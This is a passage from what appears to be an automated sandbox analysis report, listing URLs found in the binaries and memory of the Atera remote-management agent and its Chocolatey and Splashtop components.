                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://community.chocolatey.org/packages)
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://community.chocolatey.org/packages).
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://community.chocolatey.org/packages/autohotkey.portable
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://community.chocolatey.org/packages/checksum)
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://community.chocolatey.org/packages/checksum.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://community.chocolatey.org/packages/chocolatey-core.extension
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://community.chocolatey.org/packages/pik)
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://community.chocolatey.org/packages?q=id%3A.extension
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/choco/commands/uninstall
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B343000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/choco/setup#non-administrative-install
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/community-repository/community-packages-disclaimer
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/community-repository/moderation/
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/automatic-packages
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/automatic-packages#automatic-updater-au
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/automatic-packages)
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/create-packages
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/create-packages#how-do-i-exclude-executables-from-getting-s
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/create-packages#how-do-i-set-up-shims-for-applications-that
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/create-packages#package-icon-guidelines
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/get-chocolateyunzipp
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/get-chocolateywebfile
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/get-osarchitecturewidth
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/get-toolslocation
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-binfile
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyenvironmentvariable
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyfileassociation
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyinstallpackage
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateypackage
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateypath
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyshortcut
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyvsixpackage
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyzippackage
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/start-chocolateyprocessasadmin
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/uninstall-binfile
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/uninstall-chocolateyenvironmentvariable
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/uninstall-chocolateypackage
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/uninstall-chocolateyzippackage
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/features/extensions
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/features/private-cdn.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/getting-started#overriding-default-install-directory-or-other-adva
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/guides/create/create-custom-package-templates
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/guides/create/mount-an-iso-in-chocolatey-package
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/guides/create/parse-packageparameters-argument
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/guides/create/parse-packageparameters-argument#step-3---use-core-c
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/information/legal.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/troubleshooting
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.nuget.org/create/Nuspec-Reference.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.nuget.org/create/versioning#creating-prerelease-packages
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.nuget.org/create/versioning#specifying-version-ranges-in-.nuspec-files
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.splashtop.com
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A62000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A3C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.splashtop.com/csrs/Splashtop_Streamer_Win_DEPLOY_INSTALLER_v3.7.2.0.exe
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B4181000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://gist.github.com/jvshahid/6fb2f91fa7fb1db23599
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582261573.000001FD41872000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1830316893.0000022AD9402000.00000002.00000001.01000000.00000026.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2126065368.000001CC2B560000.00000002.00000001.01000000.00000034.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                                Source: CliWrap.dll.26.drString found in binary or memory: https://github.com/Tyrrrz/CliWrap
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/choco/blob/bfe351b7d10c798014efe4bfbb100b171db25099/src/chocolatey/inf
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/choco/issues/1800#issuecomment-484293844.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/choco/issues/new/choose.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/chocolatey
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/chocolatey-coreteampackages
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/chocolatey-test-environment
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/chocolatey-workshop
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/shimgen/tree/master/shim.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmp, ChocolateyTabExpansion.ps1.53.drString found in binary or memory: https://github.com/dahlbyk/posh-git
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmp, ChocolateyTabExpansion.ps1.53.drString found in binary or memory: https://github.com/dahlbyk/posh-git/blob/1941da2472eb668cde2d6a5fc921d5043a024386/LICENSE.txt
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, System.ValueTuple.dll.16.dr, System.Diagnostics.DiagnosticSource.dll.16.drString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, System.ValueTuple.dll.16.dr, System.Diagnostics.DiagnosticSource.dll.16.drString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf8
                                Source: System.Buffers.dll.26.drString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f
                                Source: System.Buffers.dll.26.drString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/roslyn/issues/46646
                                Source: System.Security.Cryptography.OpenSsl.dll.2.dr, System.Security.AccessControl.dll.2.dr, System.Data.DataSetExtensions.dll.2.dr, System.Reflection.Primitives.dll.2.dr, System.Xml.XmlSerializer.dll.2.dr, System.Runtime.Serialization.Json.dll.2.dr, System.IO.UnmanagedMemoryStream.dll.2.drString found in binary or memory: https://github.com/dotnet/runtime
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/73124.
                                Source: System.Security.Cryptography.OpenSsl.dll.2.drString found in binary or memory: https://github.com/dotnet/runtimeBSJB
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/downloads/spraints/git-tfs/GitTfs-0.11.0.zip
                                Source: AteraAgent.exe, 00000010.00000002.1925066470.0000023477EB2000.00000002.00000001.01000000.00000028.sdmpString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
                                Source: AgentPackageInternalPoller.exe, 00000037.00000002.2129021473.000001CC2B782000.00000002.00000001.01000000.00000035.sdmpString found in binary or memory: https://github.com/lextudio/sharpsnmplib.git
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/majkinetor/au-packages/commit/bf95d56fe5851ee2e4f6f15f79c1a2877a7950a1
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://licensedpackages.chocolatey.org/api/v2/
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055958000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.splashtop.com
                                Source: AgentPackageSTRemote.exe, 00000020.00000000.1634120098.0000027054F02000.00000002.00000001.01000000.0000001C.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055958000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.splashtop.com/csrs/win
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1830156930.0000022AD93F8000.00000002.00000001.01000000.00000025.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: https://nlog-project.org/
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000000.1946868282.0000010B6E4B2000.00000002.00000001.01000000.00000029.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Agents/Mac/
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/BitDefender/rmm.zip
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000000.1946868282.0000010B6E4B2000.00000002.00000001.01000000.00000029.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric/MSI/1.8.7.2/Setupx64.msi
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000000.1946868282.0000010B6E4B2000.00000002.00000001.01000000.00000029.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric/MacAgent/1.0/AteraAgentInstaller.pkgA/
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000000.1946868282.0000010B6E4B2000.00000002.00000001.01000000.00000029.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric5Get
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.ate
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.ateH
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A8821DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.ateHjO
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.ateHx
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.ateHz
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234001D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234000EC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/a
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/ag
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAg
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAge
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAgentI
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageMonitoring/0.40/AgentPackageMonitoring.z
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.3/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003F5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.3/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.Availability/0.16/Agent.Package.Availability.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234001B7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.Watchdog/1.5/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageADRemote/6.0/AgentPackageADRemote.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageAgentInformation/37.9/AgentPackageAgentInformation
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageHeartbeat/17.11/AgentPackageHeartbeat.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageInternalPoller/13.0/AgentPackageInternalPoller.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/36.9/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/36.9/AgentPackageMonitoring.ziph
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234001B7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageNetworkDiscovery/13.0/AgentPackageNetworkDiscovery
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageOsUpdates/19.9/AgentPackageOsUpdates.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageProgramManagement/24.9/AgentPackageProgramManageme
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageRuntimeInstaller/1.5/AgentPackageRuntimeInstaller.
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/23.4/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003F5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/23.4/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageSystemTools/26.6/AgentPackageSystemTools.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageTaskScheduler/13.0/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageTicketing/13.0/AgentPackageTicketing.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageUpgradeAgent/27.1/AgentPackageUpgradeAgent.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageWindowsUpdate/24.6/AgentPackageWindowsUpdate.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Availability/0.16/Agent.Package.Availability.z
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234001B7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/1.5/Agent.Package.Watchdog.zip
